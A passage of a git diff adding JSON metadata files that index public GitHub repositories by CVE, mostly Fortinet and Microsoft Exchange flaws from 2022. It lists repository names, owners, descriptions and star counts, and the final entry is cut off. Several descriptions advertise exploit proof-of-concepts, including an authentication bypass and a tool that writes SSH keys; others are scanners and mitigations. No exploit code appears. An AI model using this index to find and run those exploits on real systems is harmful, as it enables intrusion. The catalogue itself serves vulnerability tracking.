"2022-10-21T19:45:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 552802042, + "name": "CVE-2022-40684", + "full_name": "puckiestyle\/CVE-2022-40684", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-17T08:49:36Z", + "updated_at": "2022-10-17T08:49:50Z", + "pushed_at": "2022-10-17T08:49:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552819450, + "name": "Fortinet-CVE-2022-40684", + "full_name": "jsongmax\/Fortinet-CVE-2022-40684", + "owner": { + "login": "jsongmax", + "id": 54309806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54309806?v=4", + "html_url": "https:\/\/github.com\/jsongmax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jsongmax\/Fortinet-CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-17T09:22:57Z", + "updated_at": "2022-10-18T09:15:41Z", + "pushed_at": "2022-10-17T09:44:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554478703, + "name": "CVE-2022-40684", + "full_name": "und3sc0n0c1d0\/CVE-2022-40684", + "owner": { + "login": "und3sc0n0c1d0", + "id": 32236059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4", + "html_url": "https:\/\/github.com\/und3sc0n0c1d0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/CVE-2022-40684", + "description": "Utilities for exploiting vulnerability CVE-2022-40684 (FortiOS \/ FortiProxy \/ FortiSwitchManager - Authentication bypass on administrative interface).", + "fork": false, + "created_at": "2022-10-19T22:07:24Z", + "updated_at": "2022-12-29T16:39:58Z", + "pushed_at": "2022-10-24T17:10:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 557616560, + "name": "CVE-2022-40684", + "full_name": "qingsiweisan\/CVE-2022-40684", + "owner": { + "login": "qingsiweisan", + "id": 56376918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56376918?v=4", + "html_url": "https:\/\/github.com\/qingsiweisan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qingsiweisan\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-26T01:48:14Z", + "updated_at": "2024-02-11T20:21:46Z", + "pushed_at": "2022-10-26T02:16:39Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 558449420, + "name": "CVE-2022-40684-metasploit-scanner", + "full_name": "TaroballzChen\/CVE-2022-40684-metasploit-scanner", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2022-40684-metasploit-scanner", + "description": "An authentication bypass using an alternate path or channel in Fortinet product", + "fork": false, + "created_at": "2022-10-27T15:11:27Z", + "updated_at": "2024-02-05T15:50:36Z", + "pushed_at": "2022-10-27T15:32:53Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 558508203, + "name": "gotigate", + "full_name": "gustavorobertux\/gotigate", + "owner": { + "login": "gustavorobertux", + "id": 38466612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38466612?v=4", + "html_url": "https:\/\/github.com\/gustavorobertux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gustavorobertux\/gotigate", + "description": "Exploit Fortigate - CVE-2022-40684", + "fork": false, + "created_at": "2022-10-27T17:30:08Z", + "updated_at": "2022-11-05T22:48:50Z", + "pushed_at": "2022-10-28T15:26:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 558681373, + "name": "CVE-2022-40684", + "full_name": "hughink\/CVE-2022-40684", + "owner": { + "login": "hughink", + "id": 105833193, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105833193?v=4", + "html_url": "https:\/\/github.com\/hughink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hughink\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-28T03:46:00Z", + "updated_at": "2024-08-19T11:50:13Z", + "pushed_at": "2022-10-28T04:07:23Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589898622, + "name": "CVE-2022-40684-Rust", + "full_name": "notareaperbutDR34P3r\/CVE-2022-40684-Rust", + "owner": { + "login": "notareaperbutDR34P3r", + "id": 118025285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4", + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/CVE-2022-40684-Rust", + "description": null, + "fork": false, + "created_at": "2023-01-17T07:49:25Z", + "updated_at": "2023-01-17T08:08:39Z", + "pushed_at": "2023-01-17T08:08:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 607300331, + "name": "CVE-2022-40684", + "full_name": "z-bool\/CVE-2022-40684", + "owner": { + "login": "z-bool", + "id": 111605994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111605994?v=4", + "html_url": "https:\/\/github.com\/z-bool", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z-bool\/CVE-2022-40684", + "description": "一键枚举所有用户名以及写入SSH公钥", + "fork": false, + "created_at": "2023-02-27T18:05:34Z", + "updated_at": "2023-03-21T04:01:30Z", + "pushed_at": "2023-02-27T18:10:44Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 691773632, + "name": "CVE-2022-40684", + "full_name": "Anthony1500\/CVE-2022-40684", + "owner": { + "login": "Anthony1500", + "id": 51546831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51546831?v=4", + "html_url": "https:\/\/github.com\/Anthony1500", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anthony1500\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2023-09-14T21:29:03Z", + "updated_at": "2023-09-14T21:29:27Z", + "pushed_at": "2023-09-14T21:29:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40687.json b/2022/CVE-2022-40687.json new file mode 100644 index 0000000000..a47be9dfe9 --- /dev/null +++ b/2022/CVE-2022-40687.json @@ -0,0 +1,33 @@ +[ + { + "id": 558768664, + "name": "CVE-2022-40687-metasploit-scanner", + "full_name": "williamkhepri\/CVE-2022-40687-metasploit-scanner", + "owner": { + "login": "williamkhepri", + "id": 4558401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4558401?v=4", + "html_url": "https:\/\/github.com\/williamkhepri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/williamkhepri\/CVE-2022-40687-metasploit-scanner", + "description": "Omisión de autenticación utilizando una ruta o canal alternativa en el producto de Fortinet.", + "fork": false, + "created_at": "2022-10-28T08:53:12Z", + "updated_at": "2022-11-03T00:51:37Z", + "pushed_at": "2022-11-02T15:23:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40769.json b/2022/CVE-2022-40769.json new file mode 100644 index 0000000000..85b8aab9bc --- /dev/null +++ b/2022/CVE-2022-40769.json @@ -0,0 +1,33 @@ +[ + { + "id": 594246349, + "name": "CVE-2022-40769", + "full_name": "PLSRcoin\/CVE-2022-40769", + "owner": { + "login": "PLSRcoin", + "id": 99826299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99826299?v=4", + "html_url": "https:\/\/github.com\/PLSRcoin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PLSRcoin\/CVE-2022-40769", + "description": "profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-28T00:12:31Z", + "updated_at": "2023-02-20T14:52:04Z", + "pushed_at": "2022-12-29T15:29:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40799.json b/2022/CVE-2022-40799.json new file mode 100644 index 0000000000..955956e457 --- /dev/null +++ b/2022/CVE-2022-40799.json @@ -0,0 +1,37 @@ +[ + { + "id": 631698732, + "name": "CVE-2022-40799", + "full_name": "rtfmkiesel\/CVE-2022-40799", + "owner": { + "login": "rtfmkiesel", + "id": 79413747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79413747?v=4", + "html_url": "https:\/\/github.com\/rtfmkiesel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rtfmkiesel\/CVE-2022-40799", + "description": "D-Link DNR-322L - Authenticated Remote Code Execution", + "fork": false, + "created_at": "2023-04-23T20:42:18Z", + "updated_at": "2023-09-13T21:48:44Z", + "pushed_at": "2023-04-23T20:42:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "dlink", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40881.json b/2022/CVE-2022-40881.json new file mode 100644 index 0000000000..3f0b71c784 --- /dev/null +++ b/2022/CVE-2022-40881.json @@ -0,0 +1,33 @@ +[ + { + "id": 606333124, + "name": "CVE-2022-40881", + "full_name": "yilin1203\/CVE-2022-40881", + "owner": { + "login": "yilin1203", + "id": 71480339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71480339?v=4", + "html_url": "https:\/\/github.com\/yilin1203", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yilin1203\/CVE-2022-40881", + "description": null, + "fork": false, + "created_at": "2023-02-25T06:54:52Z", + "updated_at": "2023-02-27T01:21:09Z", + "pushed_at": "2023-02-25T07:31:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40916.json b/2022/CVE-2022-40916.json new file mode 100644 index 0000000000..7cc236ff77 --- /dev/null +++ b/2022/CVE-2022-40916.json @@ -0,0 +1,33 @@ +[ + { + "id": 537484841, + "name": "CVE-2022-40916", + "full_name": "whitej3rry\/CVE-2022-40916", + "owner": { + "login": "whitej3rry", + "id": 60222364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60222364?v=4", + "html_url": "https:\/\/github.com\/whitej3rry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whitej3rry\/CVE-2022-40916", + "description": null, + "fork": false, + "created_at": "2022-09-16T14:07:35Z", + "updated_at": "2022-09-28T14:29:21Z", + "pushed_at": "2022-09-28T14:37:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4096.json b/2022/CVE-2022-4096.json new file mode 100644 index 0000000000..16ba0d577f --- /dev/null +++ b/2022/CVE-2022-4096.json @@ -0,0 +1,33 @@ +[ + { + "id": 640557970, + "name": "CVE-2022-4096", + "full_name": "aminetitrofine\/CVE-2022-4096", + "owner": { + "login": "aminetitrofine", + "id": 70074517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074517?v=4", + "html_url": "https:\/\/github.com\/aminetitrofine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aminetitrofine\/CVE-2022-4096", + "description": "This experiment is destinated to demonstrate how the DNS rebinding attack works on an emulated IoT. In the setup, we have a simulated IoT device, which can be controlled through a web interface (this is typical for many IoT devices).", + "fork": false, + "created_at": "2023-05-14T13:47:05Z", + "updated_at": "2023-05-14T13:50:54Z", + "pushed_at": "2023-05-14T13:50:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41032.json b/2022/CVE-2022-41032.json new file mode 100644 index 0000000000..2aa4110d4c --- /dev/null +++ b/2022/CVE-2022-41032.json @@ -0,0 +1,33 @@ +[ + { + "id": 502183724, + "name": "cve-2022-41032", + "full_name": "ethomson\/cve-2022-41032", + "owner": { + "login": "ethomson", + "id": 1130014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1130014?v=4", + "html_url": "https:\/\/github.com\/ethomson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ethomson\/cve-2022-41032", + "description": "Reproduction \/ example repository for CVE 2022-41032.", + "fork": false, + "created_at": "2022-06-10T21:20:08Z", + "updated_at": "2023-03-30T16:23:23Z", + "pushed_at": "2022-06-10T21:20:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41034.json b/2022/CVE-2022-41034.json new file mode 100644 index 0000000000..bcb25136dd --- /dev/null +++ b/2022/CVE-2022-41034.json @@ -0,0 +1,33 @@ +[ + { + "id": 637284460, + "name": "CVE-2022-41034", + "full_name": "andyhsu024\/CVE-2022-41034", + "owner": { + "login": "andyhsu024", + "id": 131547485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131547485?v=4", + "html_url": "https:\/\/github.com\/andyhsu024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andyhsu024\/CVE-2022-41034", + "description": null, + "fork": false, + "created_at": "2023-05-07T04:30:30Z", + "updated_at": "2023-05-07T04:30:30Z", + "pushed_at": "2023-06-11T13:17:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41040.json b/2022/CVE-2022-41040.json new file mode 100644 index 0000000000..bbc2856866 --- /dev/null +++ b/2022/CVE-2022-41040.json @@ -0,0 +1,293 @@ +[ + { + "id": 544397376, + "name": "CVE-2022-41040", + "full_name": "numanturle\/CVE-2022-41040", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2022-41040", + "description": "CVE-2022-41040 nuclei template", + "fork": false, + "created_at": "2022-10-02T11:26:57Z", + "updated_at": "2024-09-27T09:58:51Z", + "pushed_at": "2022-10-02T11:55:35Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 545047982, + "name": "CVE-2022-41040_Mitigation", + "full_name": "CentarisCyber\/CVE-2022-41040_Mitigation", + "owner": { + "login": "CentarisCyber", + "id": 113211493, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113211493?v=4", + "html_url": "https:\/\/github.com\/CentarisCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CentarisCyber\/CVE-2022-41040_Mitigation", + "description": null, + "fork": false, + "created_at": "2022-10-03T17:36:13Z", + "updated_at": "2022-10-04T03:51:53Z", + "pushed_at": "2022-10-11T16:06:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 545517784, + "name": "CVE-2022-41040", + "full_name": "r3dcl1ff\/CVE-2022-41040", + "owner": { + "login": "r3dcl1ff", + "id": 81900341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81900341?v=4", + "html_url": "https:\/\/github.com\/r3dcl1ff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3dcl1ff\/CVE-2022-41040", + "description": "mitigation script for MS Exchange server vuln", + "fork": false, + "created_at": "2022-10-04T14:07:18Z", + "updated_at": "2024-11-01T09:27:08Z", + "pushed_at": "2022-10-04T14:08:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 546370723, + "name": "CVE-2022-41040", + "full_name": "d3duct1v\/CVE-2022-41040", + "owner": { + "login": "d3duct1v", + "id": 49488197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49488197?v=4", + "html_url": "https:\/\/github.com\/d3duct1v", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3duct1v\/CVE-2022-41040", + "description": "Code set relating to CVE-2022-41040", + "fork": false, + "created_at": "2022-10-06T01:20:32Z", + "updated_at": "2022-11-09T14:24:07Z", + "pushed_at": "2022-10-06T13:20:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 548444286, + "name": "CVE-2022-41040-POC", + "full_name": "kljunowsky\/CVE-2022-41040-POC", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-41040-POC", + "description": "CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server", + "fork": false, + "created_at": "2022-10-09T15:27:40Z", + "updated_at": "2024-11-25T09:26:41Z", + "pushed_at": "2023-01-21T01:57:59Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bug-bounty", + "bugbounty", + "cve-2022-41040", + "exploit", + "hacking", + "microsoft", + "microsoft-exchange", + "poc", + "proof-of-concept", + "security", + "ssrf" + ], + "visibility": "public", + "forks": 13, + "watchers": 87, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 548579073, + "name": "proxynotshell-IOC-Checker", + "full_name": "rjsudlow\/proxynotshell-IOC-Checker", + "owner": { + "login": "rjsudlow", + "id": 36338317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36338317?v=4", + "html_url": "https:\/\/github.com\/rjsudlow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rjsudlow\/proxynotshell-IOC-Checker", + "description": "Script to check for IOC's created by ProxyNotShell (CVE-2022-41040 & CVE-2022-41082)", + "fork": false, + "created_at": "2022-10-09T21:15:00Z", + "updated_at": "2023-10-06T15:02:26Z", + "pushed_at": "2022-10-09T23:24:35Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 551574337, + "name": "CVE-2022-41040", + "full_name": "ITPATJIDR\/CVE-2022-41040", + "owner": { + "login": "ITPATJIDR", + "id": 111498483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111498483?v=4", + "html_url": "https:\/\/github.com\/ITPATJIDR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ITPATJIDR\/CVE-2022-41040", + "description": null, + "fork": false, + "created_at": "2022-10-14T17:01:17Z", + "updated_at": "2024-01-02T10:32:09Z", + "pushed_at": "2022-10-15T09:10:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554575532, + "name": "CVE-2022-41040-metasploit-ProxyNotShell", + "full_name": "TaroballzChen\/CVE-2022-41040-metasploit-ProxyNotShell", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2022-41040-metasploit-ProxyNotShell", + "description": "the metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.", + "fork": false, + "created_at": "2022-10-20T03:11:03Z", + "updated_at": "2024-11-12T06:03:11Z", + "pushed_at": "2022-10-20T06:36:42Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 893042972, + "name": "CVE-2022-41040", + "full_name": "0-Gram\/CVE-2022-41040", + "owner": { + "login": "0-Gram", + "id": 108672046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108672046?v=4", + "html_url": "https:\/\/github.com\/0-Gram", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0-Gram\/CVE-2022-41040", + "description": null, + "fork": false, + "created_at": "2024-11-23T11:39:18Z", + "updated_at": "2024-11-23T11:39:52Z", + "pushed_at": "2024-11-23T11:39:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41049.json b/2022/CVE-2022-41049.json new file mode 100644 index 0000000000..f507b1a301 --- /dev/null +++ b/2022/CVE-2022-41049.json @@ -0,0 +1,33 @@ +[ + { + "id": 572578872, + "name": "CVE-2022-41049-POC", + "full_name": "Nathan01110011\/CVE-2022-41049-POC", + "owner": { + "login": "Nathan01110011", + "id": 43985198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43985198?v=4", + "html_url": "https:\/\/github.com\/Nathan01110011", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nathan01110011\/CVE-2022-41049-POC", + "description": "POC of Microcorp vuln", + "fork": false, + "created_at": "2022-11-30T15:19:43Z", + "updated_at": "2023-11-18T03:11:21Z", + "pushed_at": "2022-11-30T15:28:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41080.json b/2022/CVE-2022-41080.json new file mode 100644 index 0000000000..d11f83cea9 --- /dev/null +++ b/2022/CVE-2022-41080.json @@ -0,0 +1,33 @@ +[ + { + "id": 581681361, + "name": "CVE-2022-41080", + "full_name": "ohnonoyesyes\/CVE-2022-41080", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2022-41080", + "description": null, + "fork": false, + "created_at": "2022-12-23T23:46:36Z", + "updated_at": "2022-12-27T09:52:04Z", + "pushed_at": "2022-12-23T23:55:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41082.json b/2022/CVE-2022-41082.json new file mode 100644 index 0000000000..e65ddf3c92 --- /dev/null +++ b/2022/CVE-2022-41082.json @@ -0,0 +1,261 @@ +[ + { + "id": 544009101, + "name": "nse-exchange", + "full_name": "Diverto\/nse-exchange", + "owner": { + "login": "Diverto", + "id": 11384089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11384089?v=4", + "html_url": "https:\/\/github.com\/Diverto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diverto\/nse-exchange", + "description": "Nmap scripts to detect exchange 0-day (CVE-2022-41082) vulnerability", + "fork": false, + "created_at": "2022-10-01T11:53:14Z", + "updated_at": "2024-11-06T11:43:09Z", + "pushed_at": "2023-01-03T08:37:33Z", + "stargazers_count": 81, + "watchers_count": 81, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 81, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 565743514, + "name": "http-vuln-CVE-2022-41082", + "full_name": "notareaperbutDR34P3r\/http-vuln-CVE-2022-41082", + "owner": { + "login": "notareaperbutDR34P3r", + "id": 118025285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4", + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/http-vuln-CVE-2022-41082", + "description": "Microsoft Exchange Server Remote Code Execution Vulnerability.", + "fork": false, + "created_at": "2022-11-14T08:31:16Z", + "updated_at": "2023-02-17T00:50:04Z", + "pushed_at": "2023-03-23T07:13:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + 